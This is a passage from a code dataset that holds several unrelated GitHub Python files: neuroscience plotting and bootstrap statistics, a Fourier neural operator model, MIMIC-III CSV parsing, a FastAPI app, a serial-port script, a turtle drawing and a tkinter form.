'500']\n\nxtick_idx = []\nfor i in range(len(tempCond)):\n\n # append x-tick\n xtick_idx = xtick_idx + ([i*(end+sep) + t_zero, i*(end+sep) + t_twohundred])\n\n # compute timepoint of the start of both first and second pulse\n start_2 = timepoints_twopulse[i, 2]\n\n for j in range(len(VA)):\n # for j in range(1):\n\n # plot stimulus timecourse\n if (j == 0) & (i == 0):\n ax['broadband'].axvspan(i*(end+sep) - start + timepoints_twopulse[i, 0], i*(\n end+sep) - start + timepoints_twopulse[i, 1], facecolor='grey', alpha=0.2, label='stimulus')\n ax['broadband'].axvspan(i*(end+sep) - start + timepoints_twopulse[i, 2], i*(\n end+sep) - start + timepoints_twopulse[i, 3], facecolor='grey', alpha=0.2)\n ax['broadband_pred'].axvspan(i*(end+sep) - start + timepoints_twopulse[i, 0], i*(\n end+sep) - start + timepoints_twopulse[i, 1], facecolor='grey', alpha=0.2, label='stimulus')\n ax['broadband_pred'].axvspan(i*(end+sep) - start + timepoints_twopulse[i, 2], i*(\n end+sep) - start + timepoints_twopulse[i, 3], facecolor='grey', alpha=0.2)\n elif (j == 0):\n ax['broadband'].axvspan(i*(end+sep) - start + timepoints_twopulse[i, 0], i*(\n end+sep) - start + timepoints_twopulse[i, 1], facecolor='grey', alpha=0.2)\n ax['broadband'].axvspan(i*(end+sep) - start + timepoints_twopulse[i, 2], i*(\n end+sep) - start + timepoints_twopulse[i, 3], facecolor='grey', alpha=0.2)\n ax['broadband_pred'].axvspan(i*(end+sep) - start + timepoints_twopulse[i, 0], i*(\n end+sep) - start + timepoints_twopulse[i, 1], facecolor='grey', alpha=0.2)\n ax['broadband_pred'].axvspan(i*(end+sep) - start + timepoints_twopulse[i, 2], i*(\n end+sep) - start + timepoints_twopulse[i, 3], facecolor='grey', alpha=0.2)\n \n # select data\n data_temp = gaussian_filter1d(np.mean(broadband_bootstrap[j][:, i, :], axis=0), 10)\n model_temp = gaussian_filter1d(np.mean(broadband_pred_bootstrap[j][:, i, :], axis=0), 10)\n\n # plot broadband timecourse per visual area\n if i == 0:\n\n # plot broadband per visual area\n ax['broadband'].plot(np.arange(end - start)+i*(end+sep), data_temp[start:end], color=np.array(colors_VA[j])/255, label=VA_labels[j], lw=lw)\n\n # plot broadband per visual area\n ax['broadband_pred'].plot(np.arange(end - start)+i*(end+sep), model_temp[start:end], color=np.array(colors_VA[j])/255, label=VA_labels[j], lw=lw)\n\n else:\n\n # plot broadband per visual area\n ax['broadband'].plot(np.arange(end - start)+i*(end+sep), data_temp[start:end], color=np.array(colors_VA[j])/255, lw=lw)\n\n # plot broadband per visual area\n ax['broadband_pred'].plot(np.arange(end - start)+i*(end+sep), model_temp[start:end], color=np.array(colors_VA[j])/255, lw=lw)\n\n # plot variance (68% confidence interval)\n data_std_bootstrap = np.zeros((len(data_temp[start:end]), 2))\n model_std_bootstrap = np.zeros((len(data_temp[start:end]), 2))\n for t in range(len(data_temp[start:end])):\n data_std_bootstrap[t, :] = np.nanpercentile(broadband_bootstrap[j][:, i, start+t], [CI_low, CI_high])\n model_std_bootstrap[t, :] = np.nanpercentile(broadband_pred_bootstrap[j][:, i, start+t], [CI_low, CI_high])\n ax['broadband'].fill_between(np.arange(end - start)+i*(end+sep), gaussian_filter1d(data_std_bootstrap[:, 0], 10), gaussian_filter1d(data_std_bootstrap[:, 1], 10), color=np.array(colors_VA[j])/255, edgecolor=None, alpha=0.3)\n ax['broadband_pred'].fill_between(np.arange(end - start)+i*(end+sep), gaussian_filter1d(model_std_bootstrap[:, 0], 10), gaussian_filter1d(model_std_bootstrap[:, 1], 10), color=np.array(colors_VA[j])/255, edgecolor=None, alpha=0.3)\n\n # plot stimulus in isolation\n # NEURAL DATA\n data_pulse2 = gaussian_filter1d(np.mean(broadband_pulse2_bootstrap[j][:, i, :], axis=0)/max_data[j], 10)\n ax_broadband_isolation[j].plot(np.arange(time_window), data_pulse2[start_2 - start: start_2 - start + time_window], color=np.array(colors_VA[j])/255, alpha=alpha[i])\n\n # MODEL\n model_pulse2 = gaussian_filter1d(np.mean(broadband_pulse2_pred_bootstrap[j][:, i, :], axis=0)/max_model[j], 10)\n ax_broadband_isolation_pred[j].plot(np.arange(time_window), model_pulse2[start_2 - start: start_2 - start + time_window], color=np.array(colors_VA[j])/255, alpha=alpha[i])\n\n # plot mean data points\n # NEURAL DATA\n if i == 0:\n data_temp = ISI_recovery_avg[j, i]*100\n marker_temp = ax['ISI_recovery'].scatter(add[j, i], data_temp, color=np.array(colors_VA[j])/255, edgecolor='white', marker='o', s=150)\n marker.append(marker_temp)\n else:\n data_temp = ISI_recovery_avg[j, i]*100\n ax['ISI_recovery'].scatter(add[j, i], data_temp, color=np.array(colors_VA[j])/255, edgecolor='white', marker='o', s=150)\n\n error_min = ISI_recovery_CI[j, i, 0]*100\n error_max = ISI_recovery_CI[j, i, 1]*100\n ax['ISI_recovery'].plot([add[j, i], add[j, i]], [error_min, error_max], color='black', zorder=1)\n\n # MODEL\n if i == 0:\n data_temp = ISI_recovery_pred_avg[j, i]*100\n marker_temp = ax['ISI_recovery_pred'].scatter(add[j, i], data_temp, color=np.array(colors_VA[j])/255, edgecolor='white', marker='^', s=150)\n marker_pred.append(marker_temp)\n else:\n data_temp = ISI_recovery_pred_avg[j, i]*100\n ax['ISI_recovery_pred'].scatter(add[j, i], data_temp, color=np.array(colors_VA[j])/255, edgecolor='white', marker='^', s=150)\n\n error_min = ISI_recovery_pred_CI[j, i, 0]*100\n error_max = ISI_recovery_pred_CI[j, i, 1]*100\n ax['ISI_recovery_pred'].plot([add[j, i], add[j, i]], [error_min, error_max], color='black', zorder=1)\n\n# plot recovery curve\nfor i in range(len(VA)):\n# for i in range(1):\n\n line_temp, = ax['ISI_recovery'].plot(t1_plot/1000, ISI_recovery_log[i, :]*100, color=np.array(colors_VA[i])/255, zorder=-5, linestyle=linestyle[i])\n ax['ISI_recovery_pred'].plot(t1_plot/1000, ISI_recovery_pred_log[i, :]*100, color=np.array(colors_VA[i])/255, zorder=-5, linestyle=linestyle[i])\n line.append(line_temp)\n\n# add ticks\nax['broadband'].set_xticks(xtick_idx)\nax['broadband'].set_xticklabels([])\nax['broadband'].legend(bbox_to_anchor=(0,1.02,1,0.2), loc=\"lower left\", borderaxespad=0, ncol=4, frameon=False, fontsize=fontsize_legend)\n\nax['broadband_pred'].set_xticks(xtick_idx)\nax['broadband_pred'].set_xticklabels(np.tile(x_label_single, 6))\nax['broadband_pred'].set_xlabel('Time (ms)', fontsize=fontsize_label)\n\n# plot bargraph (slope log-linear fit)\nerror_min = adaptation_CI[:, 0]*100\nerror_max = adaptation_CI[:, 1]*100\nax['adaptation'].scatter(np.arange(len(VA)), adaptation_avg*100, color=np.array(colors_VA)/255, s=s)\nax['adaptation'].plot([np.arange(len(VA)), np.arange(len(VA))], [error_min, error_max], color='k', zorder=1)\n\nerror_min = adaptation_pred_CI[:, 0]*100\nerror_max = adaptation_pred_CI[:, 1]*100\nax['adaptation'].scatter(np.arange(len(VA))+0.2, adaptation_pred_avg*100, color=np.array(colors_VA)/255, s=s, marker='^')\nax['adaptation'].plot([np.arange(len(VA))+0.2, np.arange(len(VA))+0.2], [error_min, error_max], color='black', zorder=1)\n\n# plot bargraph (slope log-linear fit)\nerror_min = intercept_CI[:, 0]*100\nerror_max = intercept_CI[:, 1]*100\nax['intercept'].scatter(np.arange(len(VA)), intercept_avg*100, color=np.array(colors_VA)/255, s=s)\nax['intercept'].plot([np.arange(len(VA)), np.arange(len(VA))], [error_min, error_max], color='k', zorder=1)\n\nerror_min = intercept_pred_CI[:, 0]*100\nerror_max = intercept_pred_CI[:, 1]*100\nax['intercept'].scatter(np.arange(len(VA))+0.2, intercept_pred_avg*100, color=np.array(colors_VA)/255, s=s, marker='^')\nax['intercept'].plot([np.arange(len(VA))+0.2, np.arange(len(VA))+0.2], [error_min, error_max], color='black', zorder=1)\n\n# add legend to tempCond recovery plot\nvertical_line1 = lines.Line2D([], [], color='black', marker='|', linestyle='None', markersize=30)\nvertical_line2 = lines.Line2D([], [], color='black', marker='|', linestyle='None', markersize=30) \nvertical_line3 = lines.Line2D([], [], color='black', marker='|', linestyle='None', markersize=30) \nax['ISI_recovery'].legend([(vertical_line1, marker[0], line[0]), (vertical_line2 , marker[1], line[1]), (vertical_line3 , marker[2], line[2])], [VA_labels[0], VA_labels[1], VA_labels[2]], loc='upper left', ncol=3, frameon=False, fontsize=fontsize_legend)\nax['ISI_recovery_pred'].legend([(vertical_line1, marker_pred[0], line[0]), (vertical_line2 , marker_pred[1], line[1]), (vertical_line3 , marker_pred[2], line[2])], [VA_labels[0], VA_labels[1], VA_labels[2]], loc='upper left', ncol=3, frameon=False, fontsize=fontsize_legend)\n\n# save figure\nplt.tight_layout()\nplt.savefig(dir+'mkFigure/Fig5_6_' + img_type + '.svg', format='svg', bbox_inches='tight')\nplt.savefig(dir+'mkFigure/Fig5_6_' + img_type, dpi=300, bbox_inches='tight')\n# plt.show()\n\n############################################################################\n######################################################## STATISTICAL TESTING\n\nalpha = 0.0083\n\nmetrics = ['Avg. adaptation', 'Intercept']\nfor i in range(2):\n\n print(30*'--')\n print(metrics[i])\n\n if i == 0: # avg. adaptation\n\n print('#'*30)\n print('NEURAL DATA')\n\n # early vs. ventral\n sample1 = adaptation_medians[0, :]\n sample2 = adaptation_medians[1, :]\n param_diffs = sample1 - sample2\n\n p = np.min([len(param_diffs[param_diffs < 0]), len(param_diffs[param_diffs > 0])])/B_repetitions\n if p < alpha:\n print('V1-3 vs. VOTC: ', p, ' SIGNIFICANT')\n else:\n print('V1-3 vs. VOTC: ', p)\n\n # early vs. LO\n sample1 = adaptation_medians[0, :]\n sample2 = adaptation_medians[2, :]\n param_diffs = sample1 - sample2\n\n p = np.min([len(param_diffs[param_diffs < 0]), len(param_diffs[param_diffs > 0])])/B_repetitions\n if p < alpha:\n print('V1-3 vs. LOTC: ', p, ' SIGNIFICANT')\n else:\n print('V1-3 vs. LOTC: ', p)\n\n # ventral vs. LO\n sample1 = adaptation_medians[1, :]\n sample2 = adaptation_medians[2, :]\n param_diffs = sample1 - sample2\n\n p = np.min([len(param_diffs[param_diffs < 0]), len(param_diffs[param_diffs > 0])])/B_repetitions\n if p < alpha:\n print('VOTC vs. LOTC: ', p, ' SIGNIFICANT')\n else:\n print('VOTC vs. LOTC: ', p)\n\n print('#'*30)\n print('MODEL')\n\n # early vs. ventral\n sample1 = adaptation_pred_medians[0, :]\n sample2 = adaptation_pred_medians[1, :]\n param_diffs = sample1 - sample2\n\n p = np.min([len(param_diffs[param_diffs < 0]), len(param_diffs[param_diffs > 0])])/B_repetitions\n if p < alpha:\n print('V1-3 vs. VOTC: ', p, ' SIGNIFICANT')\n else:\n print('V1-3 vs. VOTC: ', p)\n\n # early vs. LO\n sample1 = adaptation_pred_medians[0, :]\n sample2 = adaptation_pred_medians[2, :]\n param_diffs = sample1 - sample2\n\n p = np.min([len(param_diffs[param_diffs < 0]), len(param_diffs[param_diffs > 0])])/B_repetitions\n if p < alpha:\n print('V1-3 vs. LOTC: ', p, ' SIGNIFICANT')\n else:\n print('V1-3 vs. LOTC: ', p)\n\n # ventral vs. LO\n sample1 = adaptation_pred_medians[1, :]\n sample2 = adaptation_pred_medians[2, :]\n param_diffs = sample1 - sample2\n\n p = np.min([len(param_diffs[param_diffs < 0]), len(param_diffs[param_diffs > 0])])/B_repetitions\n if p < alpha:\n print('VOTC vs. LOTC: ', p, ' SIGNIFICANT')\n else:\n print('VOTC vs. LOTC: ', p)\n\n elif i == 1: # intercept`\n\n print('#'*30)\n print('NEURAL DATA')\n\n # early vs. ventral\n sample1 = intercept_medians[0, :]\n sample2 = intercept_medians[1, :]\n param_diffs = sample1 - sample2\n\n p = np.min([len(param_diffs[param_diffs < 0]), len(param_diffs[param_diffs > 0])])/B_repetitions\n if p < alpha:\n print('V1-3 vs. VOTC: ', p, ' SIGNIFICANT')\n else:\n print('V1-3 vs. VOTC: ', p)\n\n # early vs. LO\n sample1 = intercept_medians[0, :]\n sample2 = intercept_medians[2, :]\n param_diffs = sample1 - sample2\n\n p = np.min([len(param_diffs[param_diffs < 0]), len(param_diffs[param_diffs > 0])])/B_repetitions\n if p < alpha:\n print('V1-3 vs. LOTC: ', p, ' SIGNIFICANT')\n else:\n print('V1-3 vs. LOTC: ', p)\n\n # ventral vs. LO\n sample1 = intercept_medians[1, :]\n sample2 = intercept_medians[2, :]\n param_diffs = sample1 - sample2\n\n p = np.min([len(param_diffs[param_diffs < 0]), len(param_diffs[param_diffs > 0])])/B_repetitions\n if p < alpha:\n print('VOTC vs. LOTC: ', p, ' SIGNIFICANT')\n else:\n print('VOTC vs. LOTC: ', p)\n\n print('#'*30)\n print('MODEL')\n\n # early vs. ventral\n sample1 = intercept_pred_medians[0, :]\n sample2 = intercept_pred_medians[1, :]\n param_diffs = sample1 - sample2\n\n p = np.min([len(param_diffs[param_diffs < 0]), len(param_diffs[param_diffs > 0])])/B_repetitions\n if p < alpha:\n print('V1-3 vs. VOTC: ', p, ' SIGNIFICANT')\n else:\n print('V1-3 vs. VOTC: ', p)\n\n # early vs. LO\n sample1 = intercept_pred_medians[0, :]\n sample2 = intercept_pred_medians[2, :]\n param_diffs = sample1 - sample2\n\n p = np.min([len(param_diffs[param_diffs < 0]), len(param_diffs[param_diffs > 0])])/B_repetitions\n if p < alpha:\n print('V1-3 vs. LOTC: ', p, ' SIGNIFICANT')\n else:\n print('V1-3 vs. LOTC: ', p)\n\n # ventral vs. LO\n sample1 = intercept_pred_medians[1, :]\n sample2 = intercept_pred_medians[2, :]\n param_diffs = sample1 - sample2\n\n p = np.min([len(param_diffs[param_diffs < 0]), len(param_diffs[param_diffs > 0])])/B_repetitions\n if p < alpha:\n print('VOTC vs. LOTC: ', p, ' SIGNIFICANT')\n else:\n print('VOTC vs. LOTC: ', p)","repo_name":"ABra1993/tAdaptation_ECoG","sub_path":"mkFigure5_6.py","file_name":"mkFigure5_6.py","file_ext":"py","file_size_in_byte":45627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"33193327051","text":"########################################################################################################################\n# #\n# 2D Fourier network from #\n# \"Fourier Neural Operator for Parametric Partial Differential Equations\" #\n# by Zongyi Li et. al., https://arxiv.org/abs/2010.08895 #\n# https://github.com/zongyi-li/fourier_neural_operator/blob/master/fourier_2d.py #\n# #\n# Ekhi Ajuria, Guillaume Bogopolsky, CERFACS, 19.01.2021 #\n# #\n########################################################################################################################\n\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.fft\nfrom torch.nn.parameter import Parameter\n\nimport operator\nfrom functools import partial, reduce\n\n\n# Complex multiplication\ndef compl_mul2d(a, b):\n # (batch, in_channel, x,y ), (in_channel, out_channel, x,y) -> (batch, out_channel, x,y)\n op = partial(torch.einsum, \"bixy,ioxy->boxy\")\n return torch.stack([\n op(a[..., 0], b[..., 0]) - op(a[..., 1], b[..., 1]),\n op(a[..., 1], b[..., 0]) + op(a[..., 0], b[..., 1])\n ], dim=-1)\n\n# Ensurer periodicity\ndef mirror(x):\n double_size = []\n # The input is supposed of dim 4 (bsz, channels, H, W)\n for i, size in enumerate(list(x.size())):\n if i < 2:\n double_size.append(size)\n # Only double up H and W\n else:\n double_size.append(int(2 * size -1))\n\n # Tensor and mesh_size declaration\n mirror = torch.zeros(double_size)\n mesh_size = x.size(3)\n\n # convert to numpy\n mirror_np = mirror.cpu().numpy() \n x_np = x.cpu().numpy()\n\n # Mirroring\n mirror_np[:, :, mesh_size - 1 :, mesh_size - 1 :] = x_np[:,:]\n mirror_np[:, :, : mesh_size - 1, : mesh_size - 1] = x_np[:, :, -1:0:-1, -1:0:-1]\n mirror_np[:, :, mesh_size - 1 :, : mesh_size - 1] = - x_np[:, :, :, -1:0:-1]\n mirror_np[:, :, : mesh_size - 1, mesh_size - 1 :] = - x_np[:, :, -1:0:-1, :]\n\n # Reconvert to torch\n mirror = torch.from_numpy(mirror_np).cuda()\n x = torch.from_numpy(x_np).cuda()\n\n return mirror\n\n# Not that useful, but just in case, takes simple and doubled up domains.\ndef unmirror(x_small, x_big):\n # Declaration os tensor and mesh size\n unmirrored = torch.zeros_like(x_small)\n mesh_size = x_small.size(3)\n\n # Take correct cuadrant! \n unmirrored[:,:] = x_big[:,:, mesh_size - 1 :, mesh_size - 1 :]\n return unmirrored\n\n################################################################\n# Fourier layer\n################################################################\n\nclass _SpectralConv2d(nn.Module):\n def __init__(self, in_channels, out_channels, modes1, modes2):\n super(_SpectralConv2d, self).__init__()\n\n \"\"\"\n 2D Fourier layer. It does FFT, linear transform, and Inverse FFT. \n \"\"\"\n\n self.in_channels = in_channels\n self.out_channels = out_channels\n self.modes1 = modes1 # Number of Fourier modes to multiply, at most floor(N/2) + 1\n self.modes2 = modes2\n\n self.scale = (1 / (in_channels * out_channels))\n self.weights1 = nn.Parameter(self.scale * torch.rand(in_channels, out_channels, self.modes1, self.modes2, 2))\n self.weights2 = nn.Parameter(self.scale * torch.rand(in_channels, out_channels, self.modes1, self.modes2, 2))\n\n def forward(self, x):\n batchsize = x.shape[0]\n # Compute Fourier coeffcients up to factor of e^(- something constant)\n # x_ft = torch.fft.rfft(x, 2, norm=\"forward\")\n x_ft = torch.rfft(x, 2, normalized=True, onesided=True)\n\n # Multiply relevant Fourier modes\n out_ft = torch.zeros(batchsize, self.in_channels, x.size(-2), x.size(-1)//2 + 1, 2, device=x.device)\n out_ft[:, :, :self.modes1, :self.modes2] = \\\n compl_mul2d(x_ft[:, :, :self.modes1, :self.modes2], self.weights1)\n out_ft[:, :, -self.modes1:, :self.modes2] = \\\n compl_mul2d(x_ft[:, :, -self.modes1:, :self.modes2], self.weights2)\n\n # Return to physical space\n x = torch.irfft(out_ft, 2, normalized=True, onesided=True, signal_sizes=( x.size(-2), x.size(-1)))\n # x = torch.fft.irfft(out_ft, 2, norm=\"forward\", signal_sizes=( x.size(-2), x.size(-1)))\n return x\n\n\nclass _SimpleBlock2d(nn.Module):\n def __init__(self, data_channels, modes1, modes2, width):\n super(_SimpleBlock2d, self).__init__()\n\n \"\"\"\n The overall network. It contains 4 layers of the Fourier layer.\n 1. Lift the input to the desire channel dimension by self.fc0 .\n 2. 4 layers of the integral operators u' = (W + K)(u).\n W defined by self.w; K defined by self.conv .\n 3. Project from the channel space to the output space by self.fc1 and self.fc2 .\n \n input: the solution of the coefficient function and locations (a(x, y), x, y)\n input shape: (batchsize, x=s, y=s, c=3)\n output: the solution \n output shape: (batchsize, x=s, y=s, c=1)\n \"\"\"\n\n self.modes1 = modes1\n self.modes2 = modes2\n self.width = width\n self.data_channels = data_channels\n self.fc0 = nn.Linear(self.data_channels, self.width) # input channel is 3: (a(x, y), x, y)\n\n self.conv0 = _SpectralConv2d(self.width, self.width, self.modes1, self.modes2)\n self.conv1 = _SpectralConv2d(self.width, self.width, self.modes1, self.modes2)\n self.conv2 = _SpectralConv2d(self.width, self.width, self.modes1, self.modes2)\n self.conv3 = _SpectralConv2d(self.width, self.width, self.modes1, self.modes2)\n self.w0 = nn.Conv1d(self.width, self.width, 1)\n self.w1 = nn.Conv1d(self.width, self.width, 1)\n self.w2 = nn.Conv1d(self.width, self.width, 1)\n self.w3 = nn.Conv1d(self.width, self.width, 1)\n self.bn0 = torch.nn.BatchNorm2d(self.width)\n self.bn1 = torch.nn.BatchNorm2d(self.width)\n self.bn2 = torch.nn.BatchNorm2d(self.width)\n self.bn3 = torch.nn.BatchNorm2d(self.width)\n\n self.fc1 = nn.Linear(self.width, 128)\n self.fc2 = nn.Linear(128, 1)\n\n def forward(self, x):\n\n # Double up the domain to ensure periodicity\n # save small domain just in case (not that necessary, but just in case)\n x_small = x\n x = mirror(x)\n\n batchsize = x.shape[0]\n size_x, size_y = x.shape[2], x.shape[3]\n\n x = x.permute(0, 2, 3, 1)\n x = self.fc0(x)\n x = x.permute(0, 3, 1, 2)\n\n x1 = self.conv0(x)\n x2 = self.w0(x.view(batchsize, self.width, -1)).view(batchsize, self.width, size_x, size_y)\n x = self.bn0(x1 + x2)\n x = F.relu(x)\n x1 = self.conv1(x)\n x2 = self.w1(x.view(batchsize, self.width, -1)).view(batchsize, self.width, size_x, size_y)\n x = self.bn1(x1 + x2)\n x = F.relu(x)\n x1 = self.conv2(x)\n x2 = self.w2(x.view(batchsize, self.width, -1)).view(batchsize, self.width, size_x, size_y)\n x = self.bn2(x1 + x2)\n x = F.relu(x)\n x1 = self.conv3(x)\n x2 = self.w3(x.view(batchsize, self.width, -1)).view(batchsize, self.width, size_x, size_y)\n x = self.bn3(x1 + x2)\n\n x = x.permute(0, 2, 3, 1)\n x = self.fc1(x)\n x = x.permute(0, 3, 1, 2)\n x = F.relu(x)\n x = x.permute(0, 2, 3, 1)\n x = self.fc2(x)\n x = x.permute(0, 3, 1, 2)\n\n # Take the correct cuadrant!\n x = unmirror(x_small, x)\n\n return x\n\n\nclass FourierNet2D(nn.Module):\n \"\"\"\n A wrapper class\n \"\"\"\n def __init__(self, data_channels, modes, width):\n super(FourierNet2D, self).__init__()\n self.conv1 = _SimpleBlock2d(data_channels, modes, modes, width)\n\n def forward(self, x):\n x = self.conv1(x)\n # return x.squeeze()\n return x\n\n def count_params(self):\n c = 0\n for p in self.parameters():\n c += reduce(operator.mul, list(p.size()))\n\n return c\n","repo_name":"lionelchg/PlasmaNet","sub_path":"PlasmaNet/nnet/model/li_fourier_2d.py","file_name":"li_fourier_2d.py","file_ext":"py","file_size_in_byte":8597,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"78"} +{"seq_id":"37762049816","text":"import uvicorn\nfrom fastapi import FastAPI\n\nfrom src.config import settings\nfrom src.graphql_api import graphql_app\n\napp = FastAPI()\napp.include_router(graphql_app, prefix=\"/graphql\")\n\n\n@app.get(\"/\")\nasync def root():\n return {\"messagge\": settings.PORT}\n\n\nif __name__ == \"__main__\":\n uvicorn.run(\n \"main:app\",\n host=settings.HOST,\n reload=True,\n port=settings.PORT,\n )\n","repo_name":"ivansantiagojr/fastapi_graphql","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"41487465918","text":"import os\nfrom datetime import datetime\n\nimport pandas as pd\nimport numpy as np\n\n\ndef parse_admission(path) -> dict:\n print('parsing ADMISSIONS.csv ...')\n admission_path = os.path.join(path, 'ADMISSIONS.csv')\n admissions = pd.read_csv(\n admission_path,\n usecols=['SUBJECT_ID', 'HADM_ID', 'ADMITTIME'],\n converters={ 'SUBJECT_ID': np.int, 'HADM_ID': np.int, 'ADMITTIME': np.str }\n )\n all_patients = dict()\n for i, row in admissions.iterrows():\n if i % 100 == 0:\n print('\\r\\t%d in %d rows' % (i + 1, len(admissions)), end='')\n pid = row['SUBJECT_ID']\n admission_id = row['HADM_ID']\n admission_time = datetime.strptime(row['ADMITTIME'], '%Y-%m-%d %H:%M:%S')\n if pid not in all_patients:\n all_patients[pid] = []\n admission = all_patients[pid]\n admission.append({\n 'admission_id': admission_id,\n 'admission_time': admission_time\n })\n print('\\r\\t%d in %d rows' % (len(admissions), len(admissions)))\n\n patient_admission = dict()\n for pid, admissions in all_patients.items():\n if len(admissions) > 1:\n patient_admission[pid] = sorted(admissions, key=lambda admission: admission['admission_time'])\n\n return patient_admission\n\n\ndef parse_diagnoses(path, patient_admission: dict) -> dict:\n print('parsing DIAGNOSES_ICD.csv ...')\n diagnoses_path = os.path.join(path, 'DIAGNOSES_ICD.csv')\n diagnoses = pd.read_csv(\n diagnoses_path,\n usecols=['SUBJECT_ID', 'HADM_ID', 'ICD9_CODE'],\n converters={ 'SUBJECT_ID': np.int, 'HADM_ID': np.int, 'ICD9_CODE': np.str }\n )\n\n def to_standard_icd9(code: str):\n split_pos = 4 if code.startswith('E') else 3\n icd9_code = code[:split_pos] + '.' + code[split_pos:] if len(code) > split_pos else code\n return icd9_code\n\n admission_codes = dict()\n for i, row in diagnoses.iterrows():\n if i % 100 == 0:\n print('\\r\\t%d in %d rows' % (i + 1, len(diagnoses)), end='')\n pid = row['SUBJECT_ID']\n if pid in patient_admission:\n admission_id = row['HADM_ID']\n code = row['ICD9_CODE']\n if code == '':\n continue\n code = to_standard_icd9(code)\n if admission_id not in admission_codes:\n codes = []\n admission_codes[admission_id] = codes\n else:\n codes = admission_codes[admission_id]\n codes.append(code)\n print('\\r\\t%d in %d rows' % (len(diagnoses), len(diagnoses)))\n\n return admission_codes\n\n\ndef parse_notes(path, patient_admission: dict, use_summary=False) -> dict:\n print('parsing NOTEEVENTS.csv ...')\n notes_path = os.path.join(path, 'NOTEEVENTS.csv')\n notes = pd.read_csv(\n notes_path,\n usecols=['HADM_ID', 'TEXT', 'CATEGORY'],\n converters={'HADM_ID': lambda x: np.int(x) if x != '' else -1, 'TEXT': np.str, 'CATEGORY': np.str}\n )\n patient_note = dict()\n for i, (pid, admissions) in enumerate(patient_admission.items()):\n print('\\r\\t%d in %d patients' % (i + 1, len(patient_admission)), end='')\n admission_id = admissions[-1]['admission_id']\n if use_summary:\n note = [row['TEXT'] for _, row in notes[notes['HADM_ID'] == admission_id].iterrows()\n if row['CATEGORY'] == 'Discharge summary']\n else:\n # note = notes[notes['HADM_ID'] == admission_id]['TEXT'].tolist()\n note = [row['TEXT'] for _, row in notes[notes['HADM_ID'] == admission_id].iterrows()\n if row['CATEGORY'] != 'Discharge summary']\n note = ' '.join(note)\n if len(note) > 0:\n patient_note[pid] = note\n print('\\r\\t%d in %d patients' % (len(patient_admission), len(patient_admission)))\n return patient_note\n\n\ndef calibrate_patient_by_admission(patient_admission: dict, admission_codes: dict):\n print('calibrating patients by admission ...')\n del_pids = []\n for pid, admissions in patient_admission.items():\n for admission in admissions:\n if admission['admission_id'] not in admission_codes:\n break\n else:\n continue\n del_pids.append(pid)\n for pid in del_pids:\n admissions = patient_admission[pid]\n for admission in admissions:\n if admission['admission_id'] in admission_codes:\n del admission_codes[admission['admission_id']]\n else:\n print('\\tpatient %d have an admission %d without diagnosis' % (pid, admission['admission_id']))\n del patient_admission[pid]\n\n\ndef calibrate_patient_by_notes(patient_admission: dict, admission_codes: dict, patient_note: dict):\n print('calibrating patients by notes ...')\n del_pids = [pid for pid in patient_admission if pid not in patient_note]\n for pid in del_pids:\n print('\\tpatient %d doesn\\'t have notes' % pid)\n admissions = patient_admission[pid]\n for admission in admissions:\n del admission_codes[admission['admission_id']]\n del patient_admission[pid]\n","repo_name":"LuChang-CS/CGL","sub_path":"preprocess/parse_csv.py","file_name":"parse_csv.py","file_ext":"py","file_size_in_byte":5124,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"78"} +{"seq_id":"15276409829","text":"import serial\n\n\nif __name__ == \"__main__\":\n port = serial.Serial()\n port.port = \"COM3\"\n port.baudrate = 115200\n port.open()\n while True:\n data = port.readline()\n print(data)\n if (\"There\" in data.decode(\"ascii\")):\n break\n data = bytes(\"Hello\\r\\n\", \"ascii\")\n port.write(data)\n port.close()\n","repo_name":"ObliviousReality/JacDeck","sub_path":"Serial.py","file_name":"Serial.py","file_ext":"py","file_size_in_byte":352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"32296211919","text":"import turtle as c \nimport colorsys\nt.bgcolor(\"black\")\nt.tracer(100)\nt.pensize(1)\nh = 0.5\nfor i in range(250):\n c = colorsys.hsv_to_rgb(h,1,1)\n h = 0.0008\n t.fillcolor(c)\n t.begin_fill()\n t.fd(i)\n t.lt(100)\n t.circle(30)\n for j in range(2):\n t.fd(i*j)\n t.rt(109)\n t.end_fill()\n","repo_name":"sksalahuddin2828/Python","sub_path":"turtle_one.py","file_name":"turtle_one.py","file_ext":"py","file_size_in_byte":318,"program_lang":"python","lang":"en","doc_type":"code","stars":200,"dataset":"github-code","pt":"78"} +{"seq_id":"26697684454","text":"from tkinter import *\nimport tkinter.ttk as ttk\nimport tkinter.font as tkFont\nimport tkinter.messagebox as tkMsgBox\nimport bll.pelis as peli\n\nclass Pelicula(Toplevel):\n def __init__(self, master=None, peli_id = None): \n super().__init__(master)\n self.master = master\n self.peli_id = peli_id \n self.title(\"Pelicula\")\n #setting window size\n width=383\n height=431\n screenwidth = self.winfo_screenwidth()\n screenheight = self.winfo_screenheight()\n alignstr = '%dx%d+%d+%d' % (width, height, (screenwidth - width) / 2, (screenheight - height) / 2)\n self.geometry(alignstr)\n self.resizable(width=False, height=False)\n\n GLabel_572=Label(self)\n ft = tkFont.Font(family='Times',size=10)\n GLabel_572[\"font\"] = ft\n GLabel_572[\"fg\"] = \"#999999\"\n GLabel_572[\"justify\"] = \"center\"\n GLabel_572[\"text\"] = \"Titulo\"\n GLabel_572.place(x=15,y=35,width=94,height=30)\n\n Gtit=Entry(self, name=\"txtTitulo\")\n Gtit[\"borderwidth\"] = \"1px\"\n ft = tkFont.Font(family='Times',size=10)\n Gtit[\"font\"] = ft\n Gtit[\"fg\"] = \"#333333\"\n Gtit[\"justify\"] = \"left\"\n Gtit[\"text\"] = \"\"\n Gtit.place(x=40,y=60,width=250,height=30)\n\n GLabel_102=Label(self)\n ft = tkFont.Font(family='Times',size=10)\n GLabel_102[\"font\"] = ft\n GLabel_102[\"fg\"] = \"#999999\"\n GLabel_102[\"justify\"] = \"center\"\n GLabel_102[\"text\"] = \"Descripcion\"\n GLabel_102.place(x=35,y=105,width=92,height=30)\n\n Gdesc= Entry(self, name=\"txtDescripcion\")\n Gdesc[\"borderwidth\"] = \"1px\"\n ft = tkFont.Font(family='Times',size=10)\n 